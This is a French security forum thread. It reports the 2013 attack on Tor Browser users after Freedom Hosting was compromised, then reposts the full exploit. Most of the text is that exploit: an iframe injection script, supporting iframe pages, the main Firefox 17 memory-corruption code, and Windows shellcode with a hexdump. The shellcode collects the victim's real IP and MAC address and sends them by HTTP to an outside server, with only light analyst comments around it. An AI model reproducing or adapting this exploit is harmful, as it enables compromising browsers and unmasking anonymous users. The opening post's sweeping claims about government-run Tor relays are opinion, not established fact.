Annonce

Réduire
Aucune annonce.

Tor : Anonymat, faille, infiltration du FBI

Réduire
X
Réduire
 
  • Page sur 1
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages
Précédent template Suivante
  • #1

    News Tor : Anonymat, faille, infiltration du FBI

    Le 4 août à minuit, des nœuds TOR sont reportés disparus du réseau anonyme. Par la suite, on a appris que TOR, le réseau mondial de routeurs décentralisés, venait d'être victime d'une attaque sérieuse. La vulnérabilité à l'origine de cette dernière permet à un hacker d'exécuter du code arbitraire dans un navigateur distant.

    La vulnérabilité de sécurité de TOR est due à un bundle intégré aux versions de Firefox antérieures à la 17.0.7. Seuls les utilisateurs de Windows en ont fait les frais (pour changer).

    Le malware injecté dans les navigateurs vulnérables est un code JavaScript qui permet de collecter les adresses MAC et les adresses IP réelles du périphérique sur lequel il s'exécute, pour ensuite les envoyer à un serveur web via un moyen non anonyme. Bien que les chiffres sur les périphériques touchés ne soient pas connus, tous les utilisateurs de Windows courent un risque.

    Une question se pose alors : qui peut en être le responsable ? Bien qu'aucune revendication n'ait été faite, les spéculations prises ça et là convergent vers le FBI.

    Depuis le temps qu'on vous dit que le réseau TOR apporte plus de problèmes que de solutions !

    En effet, le réseau est extrêmement surveillé par les gouvernements et certains serveurs relais leurs appartiennent permettant de faire l'équivalent d'une MITM tout en laissant croire aux utilisateurs qu'ils auront trouvé le graal de l'anonymat !
    sigpic

    Cyprium Download Link

    Plus j'étudie plus j'me rends compte que je n'sais rien.

    †|
    Tags: anonymat, faille, infiltration, tor
  • #2
    Pour info, ci dessous le sploit qui a été utilisé.

    3 Conditions pour son éxecution:
    - Etre sous windows
    - Utiliser FF 17
    - Avoir activé Javascript

    Le sploit a été distribué suie à la compromission de FreedomHosting par nos amis cravateux du FBI.

    Code:
    /****************************************************************************
 * Exploits delivered from through nl7qbezu7pqsuone.onion (2013-08-03):
 *
 *  The compromised server inserts a run-of-the-mill unobfuscated iframe
 * injection script; others have observed this and samples have been posted.
 *
 *  The exploit is split across three files and presumably an ultimate
 * payload of malware that was not obtained.
 */

// To preserve the JavaScript syntax highlighting, non-JS bits are commented out.

/****************************************************************************
 *  A somewhat cleaned up version is presented first, the original exploit
 * as first downloaded follows.
 *
 *  This appears to be an exploit in the Firefox 17 JS runtime. The script
 * does not attempt the exploit unless running on Firefox 17 on Windows.
 */

/****************************************************************************
 * A compromised server inserts a script like the following.
 * The XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX is a UUID generated by the server.
 * The exploit host will serve the exploit for any UUID, however.
 * I used 05cea4de-951d-4037-bf8f-f69055b279bb for this analysis.
 * The UUID is embedded in the shellcode.
 */

//<script type='text/javascript'>

function createCookie(name,value,minutes) {
	if (minutes) {
		var date = new Date();
		date.setTime(date.getTime()+(minutes*60*1000));
		var expires = "; expires="+date.toGMTString();
	}
	else var expires = "";
	document.cookie = name+"="+value+expires+"; path=/";
}

function readCookie(name) {
    var nameEQ = name + "=";
    var ca = document.cookie.split(';');
    for(var i=0;i < ca.length;i++) {
    	var c = ca[i];
    	while (c.charAt(0)==' ') c = c.substring(1,c.length);
    	if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
    }
    return null;
}

function isFF() {
    return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
}

function updatify() {
    var iframe = document.createElement('iframe');
    iframe.style.display = "inline";
    iframe.frameBorder = "0";
    iframe.scrolling = "no";
    iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX";
    iframe.height = "5";
    iframe.width = "*";
    document.body.appendChild(iframe);
}

function format_quick() {
    if ( ! readCookie("n_serv") ) {
        createCookie("n_serv", "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX", 30);
        updatify();
    }
}

function isReady()
{
    if ( document.readyState === "interactive" || document.readyState === "complete" ) {
    
        if ( isFF() ) {
            format_quick();
        }
    }
    else
    {
        setTimeout(isReady, 250);
    }
}
setTimeout(isReady, 250);
//</script>

/****************************************************************************
 *  The exploit server at nl7qbezu7pqsuone.onion also delivers two supporting
 * pieces that are loaded into their own iframes.  Since they are short,
 * they are included before the main exploit.
 *
 * (All lines containing HTML are commented out.)
 */

//// "content_2.html"
// <html><body></body></html>
// <script>
  var y="?????", url=window.location.href;
  if(0>url.indexOf(y)) {
    var iframe=document.createElement("iframe");
    iframe.src="content_3.html";
    document.body.appendChild(iframe)
  } else parent.w();
  function df(){return parent.df()};
// </script>

//// "content_3.html"
// <script>
  var y="?????",z="<body><img height='1' width='1' src='error.html' onerror=\"javascript: window.location.href='content_2.html?????';\" ></body>",flag=!1,var83=0;

  function b() {
    for(var e=Array(1024),d=Array(1024),c=0;1024>c;c++)
      e[c]=new ArrayBuffer(180);
    for(c=0;1024>c;c++)
      d[c]=new Int32Array(e[c],0,45),d[c][9]=var83;
      return d
  }
  function a() {
    !1==flag && (flag=!0,window.stop());
    window.stop();
    b();
    window.parent.frames[0].frameElement.ownerDocument.write(z);
    b()
  }
    var83 = parent.df();
    0!=var83 && document.addEventListener("readystatechange",a,!1);
// </script>

//// The main exploit
// <html>
// <body>
// <iframe frameborder=0  border=0 height=1 width=1 id="iframe"> </iframe>	
// </body>
// </html>

// <script>

var var1=0xB0;
var var2 = new Array(var1);					
var var3 = new Array(var1);	
var var4 = new Array(var1);

var var5=0xFF004; 	
var var6=0x3FC01;  

var var7=0x60000000; 
var var8=0x18000000; 


var var9=1;

var var10 = 0x12000000;
var var11 = 0;
var var12=0; // set in b() if on Firefox 17, read in df()
// exploit will not be attempted unless var12 is set

var var13 =0; 

// top entry point, called as onload handler
function u()
{	
	if( t() == true )
	{
		var9 = 1;		
		b();
		d();
		c();
	}else{
		return ;
	}
}

function t() // only attempt the exploit once per session
{
	if(typeof sessionStorage.tempStor !="undefined")
		return false;
	sessionStorage.tempStor="";
	return true;
}

function b()
{
	var version = al(); // ensure Firefox on Windows
	if(version <17)  
	{
		window.location.href="content_1.html"; 
	} // "content_1.html" was never obtained
	if( version >=17 && version <18 )
		var12 = 0xE8;
	return ;
}

function aj(version) // confirm Windows platform
{
	var i = navigator.userAgent.indexOf("Windows NT");
	if (i != -1)
		return true;
	return false;
}

function ak() // confirm Firefox browser
{
	var ua = navigator.userAgent;
	var browser = ua.substring(0, ua.lastIndexOf("/"));
	browser = browser.substring(browser.lastIndexOf(" ") + 1);
	if (browser != "Firefox")
		return -1;

	var version = ua.substring(ua.lastIndexOf("/") + 1);
	version = parseInt(version.substring(0, version.lastIndexOf(".")));
	return version;
}

function al() // get browser version, -1 if not exploitable
{
	version = ak();

	if (!aj(version))
		return -1;
	return version;
}
		
function d()
{
	for(var j=0;j<var1;j++)
	{
		if( j<var1/8 || j==var1-1)
		{
			var tabb = new Array(0x1ED00);
			var4[j]=tabb;
			for(i=0;i<0x1ED00;i++)
			{
				var4[j][i]=0x11559944;
			}	
		}
		var2[j]= new ArrayBuffer(var5); 
	}
	for(var j=0;j<var1;j++)
	{
		var3[j]= new Int32Array(var2[j],0,var6);
		var3[j][0]=0x11336688;   										
		
		for(var i=1;i<16;i++)	
		{  					
			var3[j][0x4000*i] = 0x11446688;   							
		}
			
	}	

	for(var j=0;j<var1;j++)
	{
		if(typeof var4[j] !="undefined")
		{
			var4[j][0]=0x22556611;   
		}
	}
}

// load the next piece of the exploit
function c()
{
	var iframe=document.getElementById("iframe");
	iframe.src="content_2.html";
}

// functions below here are called from the other iframes

// df() is passed through content_2 and used by content_3
// called nowhere else
// The exploit is not attempted if this returns zero.
// Note that var12 will be zero unless on Firefox 17.
// The returned value is used as part of a heap spray in content_3.
function df()
{
	if(var12==0)
	{
		return 0x00000000;
	}
	var var14 = var10 + 0x00010000 * var11 + 0x0000002B;

	if( var9 == 1 || var9 == 2)
		return ( var14 - var12);
	else
		return 0x00000000;
}

// w() is called from the second time content_2 is loaded
function w()
{
	if(var9==1)
		v();
	else
		x();
}

function v()
{
	if(k() == -1)
	{
		var11 = p();
		var9 = 2;	
		c();
	}else{
		x();
	}
}

//  This quickly becomes a huge mess that is obviously depending
// on the JS runtime to screw up in some arcane way.  Little is
// known about the actual exploit, other than some apparent
// shellcode in function f().  Here be dragons.

function k()
{
	for(var j=0;j<var1;j++)
	{
		if(var2[j].byteLength!=var5)
		{
			return j;
		}
	}
	return -1;
}

function p()
{
	for(var j=0;j<var1;j++)
	{
		for(var i=1;i<16;i++)
		{
			if(var3[j][i*0x4000-0x02]==0x01000000)
			{
				return -i;
			}
		}
	}
	return 0;
} 

function x()
{

	var var60 = k();
	if(var60==-1)
		return ;			

	var nextvar60 = q(var60);
	if(nextvar60==-1)
		return ;   				
		
	var var61 = o(var60);
	var var62  = new Int32Array(var2[nextvar60],0,var8);
	var var58 = n(var62,var61);
	if(var58==-1)
		return ;			

	var var50 = m(var62,var58);

	var13 = var10 + 0x00100000 + 0x00010000 * var11; 
	e(var62);

	l(var62,var58);

	var var64 = var4[var50][0];

	ac(var64,var50,var62,var58,var60);
}

function q(var60)
{
	var view  = new Int32Array(var2[var60],0,0x00040400);
	view[0x00100000/4-0x02]=var7; 
	if(var2[var60+1].byteLength==var7)
		return var60+1;
	return -1;
}

function o(var60)
{
	var view  = new Int32Array(var2[var60],0,0x00040400);

	var var59 = view[0x00100000/4-0x0C];
	var var57 = var10 + 0x00100000 + 0x00010000 * var11;	

	return ((var59 - var57)/4);
}

function n(view,firstvar58)
{
	var var57 = var10 + 0x00100000 + 0x00010000 * var11;	
	var var58=0;
	for(var i=0;i<200;i++)
	{
		if(view[var58] != 0x11336688)  	
		{
			if(view[var58] == 0x22556611 )  
				return  var58;
			else
				return -1;
		}
		if(var58==0)
		{
			var58 = firstvar58;
		}else{
			var var59=view[var58-0x0C];
			var58 = (var59 - var57)/4;
		}
	}
	return -1;
}

function m(view,var58)
{
	view[var58]=0x00000000;  
	for(var j=0;j<var1;j++)
	{
		if(typeof var4[j] !="undefined")
		{
			if(var4[j][0]!=0x22556611) 
				return j;
		}
	}
	return -1
}

function e(view)
{
	var i=0;
	for(i=0;i<0x400;i++)
	{
		view[i] = var13+0x1010 ; 
	}
	view[0x0]=var13+0x1010; 		
	view[0x44]=0x0;				
	view[0x45]=0x0;				
	view[0x400-4]=var13+0x1010; 	
	view[0x400]=0x00004004;		     		
	view[0x401]=0x7FFE0300;				
}

function l(view,var58)
{
	view[var58] = var13 + 0x1030;	
	view[var58+1] = 0xFFFFFF85;    		
}

function ac(var64,var50,var62,var58,var60)
{
	var var15=ah(var64);

	f(var15,var62,var58);

	y(var50);
	var var66 = aa(var62,var58+2);

	var var67 = i(var66,0x40,var50,var62) ;
	j(var67,var62);

	g(var50,var62);
	ab(var13+0x1040 ,var62,var58+2);

	r(var60)
	setTimeout(ad,1000);
	z(var50);
}	

function ah(var73)
{ 
	var var74 = var73.substring(0,2);
    var var70 = var74.charCodeAt(0);
    var var71 = var74.charCodeAt(1);
    var var75 = (var71 << 16) + var70;
    if (var75 == 0)
    {
        var var76 = var73.substring(32, 34);
        var var70 = var76.charCodeAt(0);
        var var71 = var76.charCodeAt(1);
        var75 = (var71 << 16) + var70;
    }
    var var15 = am(var75);
    if (var15 == -1)
    {
        return;
    }
    return var15
}

function am(var77)
{
    var var15 = new Array(2);
     if (var77 % 0x10000 == 0xE510) 					
     {      
        var78 = var77 - 0xE510;
        var15[0] = var78 + 0xE8AE;                   
        var15[1] = var78 + 0xD6EE;                   
    } 
    else if (var77 % 0x10000 == 0x9A90) 			
    {   
        var78 = var77 - 0x69A90;
        var15[0] = var78 + 0x6A063;                 
        var15[1] = var78 + 0x68968;                  
    } 
    else if (var77 % 0x10000 == 0x5E70) 				
    {   
        var78 = var77 - 0x65E70;
        var15[0] = var78 + 0x66413;                  
        var15[1] = var78 + 0x64D34;                 
    } 
    else if (var77 % 0x10000 == 0x35F3) 				
    {   
        var78 = var77 - 0x335F3;
        var15[0] = var78 + 0x4DE13;                  
        var15[1] = var78 + 0x49AB8;                  
    } 
    else if (var77 % 0x10000 == 0x5CA0) 				
    {   
        var78 = var77 - 0x65CA0;
        var15[0] = var78 + 0x66253;                 
        var15[1] = var78 + 0x64B84;                  
    } 
    else if (var77 % 0x10000 == 0x5CD0) 	 			
    {  
        var78 = var77 - 0x65CD0;
        var15[0] = var78 + 0x662A3;                  
        var15[1] = var78 + 0x64BA4;                 
        
    } 
    else if (var77 % 0x10000 == 0x6190)   			
    { 
        var78 = var77 - 0x46190;
        var15[0] = var78 + 0x467D3;                 
        var15[1] = var78 + 0x45000;                   
        
    } 
    else if (var77 % 0x10000 == 0x9CB9) 			
    {   
        var78 = var77 - 0x29CB9;
        var15[0] = var78 + 0x29B83;                
        var15[1] = var78 + 0xFFC8;                  
    } 
    else if (var77 % 0x10000 == 0x9CE9)			
    {   
        var78 = var77 - 0x29CE9;
        var15[0] = var78 + 0x29BB3;                 
        var15[1] = var78 + 0xFFD8;                  
    } 
    else if (var77 % 0x10000 == 0x70B0) 				
    {   
        var78 = var77 - 0x470B0;
        var15[0] = var78 + 0x47733;                  
        var15[1] = var78 + 0x45F18;                
    } 
    else if (var77 % 0x10000 == 0x7090)  			
    {  
        var78 = var77 - 0x47090;
        var15[0] = var78 + 0x476B3;               
        var15[1] = var78 + 0x45F18;                
    } 
    else if (var77 % 0x10000 == 0x9E49)   			
    { 
        var78 = var77 - 0x29E49;
        var15[0] = var78 + 0x29D13;                 
        var15[1] = var78 + 0x10028;                 
    } 
    else if (var77 % 0x10000 == 0x9E69)    		
    {
        var78 = var77 - 0x29E69;
        var15[0] = var78 + 0x29D33;              
        var15[1] = var78 + 0x10018;              
    }
    
    else if (var77 % 0x10000 == 0x9EB9)			
    {
        var78 = var77 - 0x29EB9;	
        var15[0] = var78 + 0x29D83;              
        var15[1] = var78 + 0xFFC8;              
    }
    else 
    {
        return -1;                         
    }
    
    return var15;
}

function f(var15,view,var16)
{
	var magneto = "";
	var magneto = ("\ufc60\u8ae8"+"\u0000\u6000"+"\ue589\ud231"+"\u8b64\u3052"+"\u528b\u8b0c"+"\u1452\u728b"+"\u0f28\u4ab7"+"\u3126\u31ff"+"\uacc0\u613c"+"\u027c\u202c"+"\ucfc1\u010d"+"\ue2c7\u52f0"+"\u8b57\u1052"+"\u428b\u013c"+"\u8bd0\u7840"+"\uc085\u4a74"+"\ud001\u8b50"+"\u1848\u588b"+"\u0120\ue3d3"+"\u493c\u348b"+"\u018b\u31d6"+"\u31ff\uacc0"+"\ucfc1\u010d"+"\u38c7\u75e0"+"\u03f4\uf87d"+"\u7d3b\u7524"+"\u58e2\u588b"+"\u0124\u66d3"+"\u0c8b\u8b4b"+"\u1c58\ud301"+"\u048b\u018b"+"\u89d0\u2444"+"\u5b24\u615b"+"\u5a59\uff51"+"\u58e0\u5a5f"+"\u128b\u86eb"+"\u5d05\ubd81"+"\u02e9\u0000"+"\u4547\u2054"+"\u7075\u858d"+"\u02d1\u0000"+"\u6850\u774c"+"\u0726\ud5ff"+"\uc085\u5e74"+"\u858d\u02d8"+"\u0000\u6850"+"\u774c\u0726"+"\ud5ff\uc085"+"\u4c74\u90bb"+"\u0001\u2900"+"\u54dc\u6853"+"\u8029\u006b"+"\ud5ff\udc01"+"\uc085\u3675"+"\u5050\u5050"+"\u5040\u5040"+"\uea68\udf0f"+"\uffe0\u31d5"+"\uf7db\u39d3"+"\u74c3\u891f"+"\u6ac3\u8d10"+"\ue1b5\u0002"+"\u5600\u6853"+"\ua599\u6174"+"\ud5ff\uc085"+"\u1f74\u8dfe"+"\u0089\u0000"+"\ue375\ubd80"+"\u024f\u0000"+"\u7401\ue807"+"\u013b\u0000"+"\u05eb\u4de8"+"\u0001\uff00"+"\ub8e7\u0100"+"\u0000\uc429"+"\ue289\u5052"+"\u6852\u49b6"+"\u01de\ud5ff"+"\u815f\u00c4"+"\u0001\u8500"+"\u0fc0\uf285"+"\u0000\u5700"+"\uf9e8\u0000"+"\u5e00\uca89"+"\ubd8d\u02e9"+"\u0000\uebe8"+"\u0000\u4f00"+"\ufa83\u7c20"+"\uba05\u0020"+"\u0000\ud189"+"\uf356\ub9a4"+"\u000d\u0000"+"\ub58d\u02c4"+"\u0000\ua4f3"+"\ubd89\u024b"+"\u0000\u565e"+"\ua968\u3428"+"\uff80\u85d5"+"\u0fc0\uaa84"+"\u0000\u6600"+"\u488b\u660a"+"\uf983\u0f04"+"\u9c82\u0000"+"\u8d00\u0c40"+"\u008b\u088b"+"\u098b\u00b8"+"\u0001\u5000"+"\ue789\uc429"+"\ue689\u5657"+"\u5151\u4868"+"\ud272\uffb8"+"\u85d5\u81c0"+"\u04c4\u0001"+"\u0f00\u0fb7"+"\uf983\u7206"+"\ub96c\u0006"+"\u0000\u10b8"+"\u0000\u2900"+"\u89c4\u89e7"+"\ud1ca\u50e2"+"\u3152\u8ad2"+"\u8816\u24d0"+"\uc0f0\u04e8"+"\u093c\u0477"+"\u3004\u02eb"+"\u3704\u0788"+"\u8847\u24d0"+"\u3c0f\u7709"+"\u0404\ueb30"+"\u0402\u8837"+"\u4707\ue246"+"\u59d4\ucf29"+"\ufe89\u0158"+"\u8bc4\u4bbd"+"\u0002\uf300"+"\uc6a4\u4f85"+"\u0002\u0100"+"\u2ee8\u0000"+"\u3100\u50c0"+"\u2951\u4fcf"+"\u5357\uc268"+"\u38eb\uff5f"+"\u53d5\u7568"+"\u4d6e\uff61"+"\ue9d5\ufec8"+"\uffff\uc931"+"\ud1f7\uc031"+"\uaef2\ud1f7"+"\uc349\u0000"+"\u0000\u8d00"+"\ue9bd\u0002"+"\ue800\uffe4"+"\uffff\ub94f"+"\u004f\u0000"+"\ub58d\u0275"+"\u0000\ua4f3"+"\ubd8d\u02e9"+"\u0000\ucbe8"+"\uffff\uc3ff"+"\u0a0d\u6f43"+"\u6e6e\u6365"+"\u6974\u6e6f"+"\u203a\u656b"+"\u7065\u612d"+"\u696c\u6576"+"\u0a0d\u6341"+"\u6563\u7470"+"\u203a\u2f2a"+"\u0d2a\u410a"+"\u6363\u7065"+"\u2d74\u6e45"+"\u6f63\u6964"+"\u676e\u203a"+"\u7a67\u7069"+"\u0a0d\u0a0d"+"\u8300\u0ec7"+"\uc931\ud1f7"+"\uc031\uaef3"+"\uff4f\u0de7"+"\u430a\u6f6f"+"\u696b\u3a65"+"\u4920\u3d44"+"\u7377\u5f32"+"\u3233\u4900"+"\u4850\u504c"+"\u5041\u0049"+"\u0002\u5000"+"\ude41\u36ca"+"\u4547\u2054"+"\u302f\u6335"+"\u6165\u6434"+"\u2d65\u3539"+"\u6431\u342d"+"\u3330\u2d37"+"\u6662\u6638"+"\u662d\u3936"+"\u3530\u6235"+"\u3732\u6239"+"\u2062\u5448"+"\u5054\u312f"+"\u312e\u0a0d"+"\u6f48\u7473"+"\u203a\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u0000"+"\u0000\u9000"+"");
	var var29 = magneto;
	var var17 = "\u9060";
	var var18 = "\u9061";
	var var19 = "\uC481\u0000\u0008" ; 
	var var20 = "\u2589\u3000"+String.fromCharCode((var13 >> 16)  & 0x0000FFFF); 
	var var21="\u258B\u3000"+String.fromCharCode((var13 >> 16)  & 0x0000FFFF);
	var var22 = "\uE589"; 
	var var23 ="\uC3C9";
	var var24  = "\uE889";         
	var24 += "\u608D\u90C0";       

	var var25 = var10 + 0x00010000 * var11 + 0x00000030 + 0x00100000;
	var var26 = var25 + var16*4

	var var27 =""
	var27 += "\uB890\u2020\u2020";          				      
	var27 += "\uA390"+ae(var26+0x00);
	var27 += "\uA390"+ae(var26+0x04);
	var27 += "\uA390"+ae(var26+0x08);
	var27 += "\uA390"+ae(var26+0x0C);

	var var28  = var17;
	var28 += var20;
	var28 += var19;
	var28 += var22;
	var28 += var27;
	var28 += var29;
    var28 += var21;
    var28 += var18;
    var28 += var23;
	var var29Array = new Array();
	var29Array=ag(var28);

	var var29Ad = var13+0x5010;
	var i=0;
	var j=0;
	var var30=var13+0x4048;
	var var31 = new Array();

	var31[0]=var30; 			
	var31[1]=var30; 			
	var31[2]=var30; 			
	var31[3]=var15[1];			
	var31[4]=var29Ad;		
	var31[5]=0xFFFFFFFF;			
	var31[6]=var13+0x4044;	
	var31[7]=var13+0x4040;	
	var31[8]=0x00000040;			
	var31[9]=var13+0x4048;	
	var31[10]=0x00040000;		
	var31[11]=var29Ad;		
	var31[12]=var13+0x301C;	
		
	for(var i=0 ; i < 0x140 ; i++)
	{
		var31[i+15]=var15[0]; 
	}	
	var var32 = 0x3F8;		
	view[0x800+0+var32]=var13+0x4018;  
	view[0x800+1+var32]=var13+0x4018; 
	for(var i=2 ; i < var31.length  ; i++)
	{
		view[0x800+i+var32]=  0x41414141; 
	}		
	for(var i=0 ; i < var31.length  ; i++)
	{
		view[0xC02+i+var32]=  var31[i];
	}				
	for(var i=0 ; i < var29Array.length ; i++)
	{
		view[0x1000 + i+var32] = var29Array[i];
	}			
	
}

function ae(int32)
{
    var var68 = String.fromCharCode((int32)& 0x0000FFFF);
    var var69 = String.fromCharCode((int32 >> 16)  & 0x0000FFFF);
    return var68+var69;
}  
    
function af(string)
{		
    var var70 = string.charCodeAt(0);
    var var71 = string.charCodeAt(1);
    var var72 = (var71 << 16) + var70;
	return var72;
}	
		
function ag(string)
{	
	if(string.length%2!=0)
		string+="\u9090";
	var intArray= new Array();
	for(var i=0 ; i*2 < string.length; i++ )
		intArray[i]=af(string[i*2]+string[i*2+1]);
	return intArray;
}	
		
function y(index)
{
	var4[index][1]= document.createElement('span') ;
}		

function aa(view,var63)
{
	return view[var63];
}	

function i(address,size,var50,view)
{
	var var56 = size/2;
	var56 = var56*0x10 +0x04;
	view[0x400]=var56;		  
	view[0x401]=address;     
	return var4[var50][0];
}

function j(memory,view)
{
	var intArray=ag(memory);
	for(var i=0 ; i < intArray.length  ; i++)
	{
		view[0x404+i]=intArray[i];		
	}
}

function g(var50,view)
{
	var k = h(var50,view);
	var j=0;
	if( k < 0 )
		return -1;
	view[0x404+k]=var13+0x3010;
	return 1;
}

function h(var50,view)
{
	var address=0;
	var u=0;
	var memory="";
	var var55=0;
	for( u =7; u >=4 ;u--)
	{
		address=view[0x404+u];
		if( address > 0x000A0000 && address < 0x80000000 )  
		{
			memory = i(address,0x48,var50,view);
			var55=af(memory[0x14]+memory[0x15]);
			if(var55==address)
			{
				return u;
			}				
		}
	}
	return -1;
}

function ab(address,view,var63)
{
	view[var63]=address;
}	

function r(var60)
{
	var view  = new Int32Array(var2[var60],0,0x00040400);
	view[0x00100000/4-0x02]=var5; 
}

function z(index,index2)
{
	var4[index][1].innerHTML;
}		

// ad() is called through setTimeout
function ad()
{
	for(var j=0;j<var1;j++)
	{
		delete var3[j]
		var3[j]= null;
		
		delete var2[j];
		var2[j] = null;

		if(typeof var4[j] !="undefined")
		{
			delete var4[j];		
			var4[j] = null;
		}	
	}	
	delete var2;
	delete var3;
	delete var4;	
	var2=null;
	var3=null;
	var4=null;	
}

window.addEventListener("onload", u(),true);

// </script>

/****************************************************************************
 * This a hexdump of the shellcode block as "var magneto" in f() above.
 */
//  0000  60 fc e8 8a 00 00 00 60  89 e5 31 d2 64 8b 52 30  |`......`..1.d.R0|
//  0010  8b 52 0c 8b 52 14 8b 72  28 0f b7 4a 26 31 ff 31  |.R..R..r(..J&1.1|
//  0020  c0 ac 3c 61 7c 02 2c 20  c1 cf 0d 01 c7 e2 f0 52  |..<a|., .......R|
//  0030  57 8b 52 10 8b 42 3c 01  d0 8b 40 78 85 c0 74 4a  |W.R..B<[email protected]|
//  0040  01 d0 50 8b 48 18 8b 58  20 01 d3 e3 3c 49 8b 34  |..P.H..X ...<I.4|
//  0050  8b 01 d6 31 ff 31 c0 ac  c1 cf 0d 01 c7 38 e0 75  |...1.1.......8.u|
//  0060  f4 03 7d f8 3b 7d 24 75  e2 58 8b 58 24 01 d3 66  |..}.;}$u.X.X$..f|
//  0070  8b 0c 4b 8b 58 1c 01 d3  8b 04 8b 01 d0 89 44 24  |..K.X.........D$|
//  0080  24 5b 5b 61 59 5a 51 ff  e0 58 5f 5a 8b 12 eb 86  |$[[aYZQ..X_Z....|
//  0090  05 5d 81 bd e9 02 00 00  47 45 54 20 75 70 8d 85  |.]......GET up..|
//  00a0  d1 02 00 00 50 68 4c 77  26 07 ff d5 85 c0 74 5e  |....PhLw&.....t^|
//  00b0  8d 85 d8 02 00 00 50 68  4c 77 26 07 ff d5 85 c0  |......PhLw&.....|
//  00c0  74 4c bb 90 01 00 00 29  dc 54 53 68 29 80 6b 00  |tL.....).TSh).k.|
//  00d0  ff d5 01 dc 85 c0 75 36  50 50 50 50 40 50 40 50  |[email protected]@P|
//  00e0  68 ea 0f df e0 ff d5 31  db f7 d3 39 c3 74 1f 89  |h......1...9.t..|
//  00f0  c3 6a 10 8d b5 e1 02 00  00 56 53 68 99 a5 74 61  |.j.......VSh..ta|
//  0100  ff d5 85 c0 74 1f fe 8d  89 00 00 00 75 e3 80 bd  |....t.......u...|
//  0110  4f 02 00 00 01 74 07 e8  3b 01 00 00 eb 05 e8 4d  |O....t..;......M|
//  0120  01 00 00 ff e7 b8 00 01  00 00 29 c4 89 e2 52 50  |..........)...RP|
//  0130  52 68 b6 49 de 01 ff d5  5f 81 c4 00 01 00 00 85  |Rh.I...._.......|
//  0140  c0 0f 85 f2 00 00 00 57  e8 f9 00 00 00 5e 89 ca  |.......W.....^..|
//  0150  8d bd e9 02 00 00 e8 eb  00 00 00 4f 83 fa 20 7c  |...........O.. ||
//  0160  05 ba 20 00 00 00 89 d1  56 f3 a4 b9 0d 00 00 00  |.. .....V.......|
//  0170  8d b5 c4 02 00 00 f3 a4  89 bd 4b 02 00 00 5e 56  |..........K...^V|
//  0180  68 a9 28 34 80 ff d5 85  c0 0f 84 aa 00 00 00 66  |h.(4...........f|
//  0190  8b 48 0a 66 83 f9 04 0f  82 9c 00 00 00 8d 40 0c  |[email protected]|
//  01a0  8b 00 8b 08 8b 09 b8 00  01 00 00 50 89 e7 29 c4  |...........P..).|
//  01b0  89 e6 57 56 51 51 68 48  72 d2 b8 ff d5 85 c0 81  |..WVQQhHr.......|
//  01c0  c4 04 01 00 00 0f b7 0f  83 f9 06 72 6c b9 06 00  |...........rl...|
//  01d0  00 00 b8 10 00 00 00 29  c4 89 e7 89 ca d1 e2 50  |.......).......P|
//  01e0  52 31 d2 8a 16 88 d0 24  f0 c0 e8 04 3c 09 77 04  |R1.....$....<.w.|
//  01f0  04 30 eb 02 04 37 88 07  47 88 d0 24 0f 3c 09 77  |.0...7..G..$.<.w|
//  0200  04 04 30 eb 02 04 37 88  07 47 46 e2 d4 59 29 cf  |..0...7..GF..Y).|
//  0210  89 fe 58 01 c4 8b bd 4b  02 00 00 f3 a4 c6 85 4f  |..X....K.......O|
//  0220  02 00 00 01 e8 2e 00 00  00 31 c0 50 51 29 cf 4f  |.........1.PQ).O|
//  0230  57 53 68 c2 eb 38 5f ff  d5 53 68 75 6e 4d 61 ff  |WSh..8_..ShunMa.|
//  0240  d5 e9 c8 fe ff ff 31 c9  f7 d1 31 c0 f2 ae f7 d1  |......1...1.....|
//  0250  49 c3 00 00 00 00 00 8d  bd e9 02 00 00 e8 e4 ff  |I...............|
//  0260  ff ff 4f b9 4f 00 00 00  8d b5 75 02 00 00 f3 a4  |..O.O.....u.....|
//  0270  8d bd e9 02 00 00 e8 cb  ff ff ff c3 0d 0a 43 6f  |..............Co|
//  0280  6e 6e 65 63 74 69 6f 6e  3a 20 6b 65 65 70 2d 61  |nnection: keep-a|
//  0290  6c 69 76 65 0d 0a 41 63  63 65 70 74 3a 20 2a 2f  |live..Accept: */|
//  02a0  2a 0d 0a 41 63 63 65 70  74 2d 45 6e 63 6f 64 69  |*..Accept-Encodi|
//  02b0  6e 67 3a 20 67 7a 69 70  0d 0a 0d 0a 00 83 c7 0e  |ng: gzip........|
//  02c0  31 c9 f7 d1 31 c0 f3 ae  4f ff e7 0d 0a 43 6f 6f  |1...1...O....Coo|
//  02d0  6b 69 65 3a 20 49 44 3d  77 73 32 5f 33 32 00 49  |kie: ID=ws2_32.I|
//  02e0  50 48 4c 50 41 50 49 00  02 00 00 50 41 de ca 36  |PHLPAPI....PA..6|
//  02f0  47 45 54 20 2f 30 35 63  65 61 34 64 65 2d 39 35  |GET /05cea4de-95|
//  0300  31 64 2d 34 30 33 37 2d  62 66 38 66 2d 66 36 39  |1d-4037-bf8f-f69|
//  0310  30 35 35 62 32 37 39 62  62 20 48 54 54 50 2f 31  |055b279bb HTTP/1|
//  0320  2e 31 0d 0a 48 6f 73 74  3a 20 00 00 00 00 00 00  |.1..Host: ......|
//  0330  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
//  *
//  03b0  00 00 00 00 00 00 00 00  00 00 00 90              |............|
//  03bc

/****************************************************************************
 * The original files as obtained from the exploit server follow:
 */

//// "content_2.html"
